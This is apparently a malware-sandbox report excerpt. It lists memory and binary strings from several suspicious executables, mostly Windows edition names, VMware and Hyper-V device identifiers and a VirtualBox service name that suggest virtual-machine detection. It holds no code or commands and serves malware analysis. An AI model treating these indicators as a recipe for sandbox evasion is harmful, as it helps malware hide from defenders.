Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, 00000007.00000003.2101195637.00000000013EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}@8
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}MAIG9
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Pc=
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022506492.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: MPGPH131.exe, 00000007.00000002.4459125656.000000000129C000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}j
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}tcachlX
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: jHYZko.exe, 00000001.00000002.2306997313.000000000125E000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.0000000001277000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnZW
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}P
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1hbin@
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459557759.0000000001FFC000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!E
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_1AEAD613
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: VBoxService.exe
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
